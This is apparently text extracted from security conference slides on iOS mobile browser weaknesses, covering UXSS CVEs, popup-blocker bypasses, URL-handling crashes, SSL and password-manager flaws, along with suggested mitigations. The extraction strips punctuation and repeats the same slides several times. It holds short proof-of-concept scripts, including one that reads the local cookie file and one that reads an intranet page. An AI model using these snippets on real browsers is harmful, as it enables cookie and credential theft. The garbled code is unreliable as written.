CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
